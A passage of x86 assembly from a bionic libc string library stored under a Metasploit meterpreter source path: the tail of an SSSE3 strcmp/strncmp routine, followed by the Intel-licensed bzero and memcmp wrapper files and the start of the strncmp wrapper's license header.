cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_8)
.p2align 4
L(nibble_ashr_8):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xff00, %esi
jnz L(ashr_8_exittail)
#ifdef USE_AS_STRNCMP
cmp $8, %ebp
jbe L(ashr_8_exittail)
#endif
pxor %xmm0, %xmm0
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_8)
.p2align 4
L(ashr_8_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $8, %xmm0
psrldq $8, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_9
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(7~15) n - 7 8(15 +(n-7) - n) ashr_9
*/
.p2align 4
L(ashr_9):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $7, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -7(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $9, %ebx
lea 9(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_9):
add $16, %edi
jg L(nibble_ashr_9)
L(gobble_ashr_9):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $9, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_9)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $9, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_9)
.p2align 4
L(nibble_ashr_9):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xfe00, %esi
jnz L(ashr_9_exittail)
#ifdef USE_AS_STRNCMP
cmp $7, %ebp
jbe L(ashr_9_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_9)
.p2align 4
L(ashr_9_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $9, %xmm0
psrldq $9, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_10
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(6~15) n - 6 9(15 +(n-6) - n) ashr_10
*/
.p2align 4
L(ashr_10):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $6, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -6(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $10, %ebx
lea 10(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_10):
add $16, %edi
jg L(nibble_ashr_10)
L(gobble_ashr_10):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $10, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_10)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $10, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_10)
.p2align 4
L(nibble_ashr_10):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xfc00, %esi
jnz L(ashr_10_exittail)
#ifdef USE_AS_STRNCMP
cmp $6, %ebp
jbe L(ashr_10_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_10)
.p2align 4
L(ashr_10_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $10, %xmm0
psrldq $10, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_11
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(5~15) n - 5 10(15 +(n-5) - n) ashr_11
*/
.p2align 4
L(ashr_11):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $5, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -5(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $11, %ebx
lea 11(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_11):
add $16, %edi
jg L(nibble_ashr_11)
L(gobble_ashr_11):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $11, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_11)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $11, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_11)
.p2align 4
L(nibble_ashr_11):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xf800, %esi
jnz L(ashr_11_exittail)
#ifdef USE_AS_STRNCMP
cmp $5, %ebp
jbe L(ashr_11_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_11)
.p2align 4
L(ashr_11_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $11, %xmm0
psrldq $11, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_12
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(4~15) n - 4 11(15 +(n-4) - n) ashr_12
*/
.p2align 4
L(ashr_12):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $4, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -4(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $12, %ebx
lea 12(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_12):
add $16, %edi
jg L(nibble_ashr_12)
L(gobble_ashr_12):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $12, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_12)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $12, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_12)
.p2align 4
L(nibble_ashr_12):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xf000, %esi
jnz L(ashr_12_exittail)
#ifdef USE_AS_STRNCMP
cmp $4, %ebp
jbe L(ashr_12_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_12)
.p2align 4
L(ashr_12_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $12, %xmm0
psrldq $12, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_13
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(3~15) n - 3 12(15 +(n-3) - n) ashr_13
*/
.p2align 4
L(ashr_13):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $3, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -3(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $13, %ebx
lea 13(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_13):
add $16, %edi
jg L(nibble_ashr_13)
L(gobble_ashr_13):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $13, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_13)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $13, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_13)
.p2align 4
L(nibble_ashr_13):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xe000, %esi
jnz L(ashr_13_exittail)
#ifdef USE_AS_STRNCMP
cmp $3, %ebp
jbe L(ashr_13_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_13)
.p2align 4
L(ashr_13_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $13, %xmm0
psrldq $13, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_14
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(2~15) n - 2 13(15 +(n-2) - n) ashr_14
*/
.p2align 4
L(ashr_14):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $2, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -2(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $14, %ebx
lea 14(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_14):
add $16, %edi
jg L(nibble_ashr_14)
L(gobble_ashr_14):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $14, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_14)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $14, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_14)
.p2align 4
L(nibble_ashr_14):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xc000, %esi
jnz L(ashr_14_exittail)
#ifdef USE_AS_STRNCMP
cmp $2, %ebp
jbe L(ashr_14_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_14)
.p2align 4
L(ashr_14_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $14, %xmm0
psrldq $14, %xmm3
jmp L(aftertail)
/*
 * The following cases will be handled by ashr_15
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(1~15) n - 1 14(15 +(n-1) - n) ashr_15
*/
.p2align 4
L(ashr_15):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $1, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -1(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $15, %ebx
lea 15(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_15):
add $16, %edi
jg L(nibble_ashr_15)
L(gobble_ashr_15):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $15, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_15)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $15, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_15)
.p2align 4
L(nibble_ashr_15):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0x8000, %esi
jnz L(ashr_15_exittail)
#ifdef USE_AS_STRNCMP
cmp $1, %ebp
jbe L(ashr_15_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_15)
.p2align 4
L(ashr_15_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $15, %xmm0
psrldq $15, %xmm3
jmp L(aftertail)
.p2align 4
L(aftertail):
pcmpeqb %xmm3, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
not %esi
L(exit):
mov %ebx, %edi
and $0x1f, %edi
lea -16(%edi, %ecx), %edi
L(less32bytes):
add %edi, %edx
add %ecx, %eax
test $0x20, %ebx
jz L(ret2)
xchg %eax, %edx
.p2align 4
L(ret2):
mov %esi, %ecx
POP (%esi)
POP (%edi)
POP (%ebx)
L(less16bytes):
test %cl, %cl
jz L(2next_8_bytes)
test $0x01, %cl
jnz L(Byte0)
test $0x02, %cl
jnz L(Byte1)
test $0x04, %cl
jnz L(Byte2)
test $0x08, %cl
jnz L(Byte3)
test $0x10, %cl
jnz L(Byte4)
test $0x20, %cl
jnz L(Byte5)
test $0x40, %cl
jnz L(Byte6)
#ifdef USE_AS_STRNCMP
cmp $7, %ebp
jbe L(eq)
#endif
movzx 7(%eax), %ecx
movzx 7(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte0):
#ifdef USE_AS_STRNCMP
cmp $0, %ebp
jbe L(eq)
#endif
movzx (%eax), %ecx
movzx (%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte1):
#ifdef USE_AS_STRNCMP
cmp $1, %ebp
jbe L(eq)
#endif
movzx 1(%eax), %ecx
movzx 1(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte2):
#ifdef USE_AS_STRNCMP
cmp $2, %ebp
jbe L(eq)
#endif
movzx 2(%eax), %ecx
movzx 2(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte3):
#ifdef USE_AS_STRNCMP
cmp $3, %ebp
jbe L(eq)
#endif
movzx 3(%eax), %ecx
movzx 3(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte4):
#ifdef USE_AS_STRNCMP
cmp $4, %ebp
jbe L(eq)
#endif
movzx 4(%eax), %ecx
movzx 4(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte5):
#ifdef USE_AS_STRNCMP
cmp $5, %ebp
jbe L(eq)
#endif
movzx 5(%eax), %ecx
movzx 5(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(Byte6):
#ifdef USE_AS_STRNCMP
cmp $6, %ebp
jbe L(eq)
#endif
movzx 6(%eax), %ecx
movzx 6(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(2next_8_bytes):
add $8, %eax
add $8, %edx
#ifdef USE_AS_STRNCMP
cmp $8, %ebp
lea -8(%ebp), %ebp
jbe L(eq)
#endif
test $0x01, %ch
jnz L(Byte0)
test $0x02, %ch
jnz L(Byte1)
test $0x04, %ch
jnz L(Byte2)
test $0x08, %ch
jnz L(Byte3)
test $0x10, %ch
jnz L(Byte4)
test $0x20, %ch
jnz L(Byte5)
test $0x40, %ch
jnz L(Byte6)
#ifdef USE_AS_STRNCMP
cmp $7, %ebp
jbe L(eq)
#endif
movzx 7(%eax), %ecx
movzx 7(%edx), %eax
sub %ecx, %eax
RETURN
.p2align 4
L(neq):
mov $1, %eax
ja L(neq_bigger)
neg %eax
L(neq_bigger):
RETURN
#ifdef USE_AS_STRNCMP
CFI_PUSH (%ebx)
CFI_PUSH (%edi)
CFI_PUSH (%esi)
.p2align 4
L(more8byteseq):
POP (%esi)
POP (%edi)
POP (%ebx)
#endif
L(eq):
#ifdef USE_AS_STRNCMP
POP (%ebp)
#endif
xorl %eax, %eax
ret
#ifdef USE_AS_STRNCMP
CFI_PUSH (%ebp)
.p2align 4
L(less16bytes_sncmp):
test %ebp, %ebp
jz L(eq)
movzbl (%eax), %ecx
cmpb %cl, (%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $1, %ebp
je L(eq)
movzbl 1(%eax), %ecx
cmpb %cl, 1(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $2, %ebp
je L(eq)
movzbl 2(%eax), %ecx
cmpb %cl, 2(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $3, %ebp
je L(eq)
movzbl 3(%eax), %ecx
cmpb %cl, 3(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $4, %ebp
je L(eq)
movzbl 4(%eax), %ecx
cmpb %cl, 4(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $5, %ebp
je L(eq)
movzbl 5(%eax), %ecx
cmpb %cl, 5(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $6, %ebp
je L(eq)
movzbl 6(%eax), %ecx
cmpb %cl, 6(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $7, %ebp
je L(eq)
movzbl 7(%eax), %ecx
cmpb %cl, 7(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $8, %ebp
je L(eq)
movzbl 8(%eax), %ecx
cmpb %cl, 8(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $9, %ebp
je L(eq)
movzbl 9(%eax), %ecx
cmpb %cl, 9(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $10, %ebp
je L(eq)
movzbl 10(%eax), %ecx
cmpb %cl, 10(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $11, %ebp
je L(eq)
movzbl 11(%eax), %ecx
cmpb %cl, 11(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $12, %ebp
je L(eq)
movzbl 12(%eax), %ecx
cmpb %cl, 12(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $13, %ebp
je L(eq)
movzbl 13(%eax), %ecx
cmpb %cl, 13(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $14, %ebp
je L(eq)
movzbl 14(%eax), %ecx
cmpb %cl, 14(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
cmp $15, %ebp
je L(eq)
movzbl 15(%eax), %ecx
cmpb %cl, 15(%edx)
jne L(neq)
test %cl, %cl
je L(eq)
POP (%ebp)
xor %eax, %eax
ret
#endif
END (ssse3_strcmp_latest)
|
OpenWireSec/metasploit | 1,719 | external/source/meterpreter/source/bionic/libc/arch-x86/string/bzero_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
 * bzero() dispatcher: when the build enables SSE2, implement bzero() by
 * instantiating the Atom-tuned SSE2 memset template in zero-fill mode;
 * otherwise fall back to the generic bzero.S implementation.
 */
#if defined(USE_SSE2)
/* Cache-size tuning parameters consumed by sse2-memset5-atom.S. */
# include "cache_wrapper.S"
/* NOTE(review): __i686 is presumably a toolchain-predefined macro that would
 * otherwise be expanded inside the included template — confirm per toolchain. */
# undef __i686
/* Build the zero-fill (bzero-style) variant of the memset template. */
# define USE_AS_BZERO
/* Rename the template's entry symbol to the public name "bzero". */
# define sse2_memset5_atom bzero
# include "sse2-memset5-atom.S"
#else
/* No SSE2 available: use the generic implementation. */
# include "bzero.S"
#endif
|
OpenWireSec/metasploit | 1,642 | external/source/meterpreter/source/bionic/libc/arch-x86/string/memcmp_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
 * memcmp() dispatcher: when the build enables SSSE3, export the SSSE3
 * implementation under the public name "memcmp" (ssse3-memcmp3.S names its
 * entry point via the MEMCMP macro); otherwise use the generic memcmp.S.
 */
#if defined(USE_SSSE3)
/* Override the template's default symbol (ssse3_memcmp3_new) with "memcmp". */
# define MEMCMP memcmp
# include "ssse3-memcmp3.S"
#else
/* No SSSE3 available: use the generic implementation. */
# include "memcmp.S"
#endif
|
OpenWireSec/metasploit | 1,681 | external/source/meterpreter/source/bionic/libc/arch-x86/string/strncmp_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
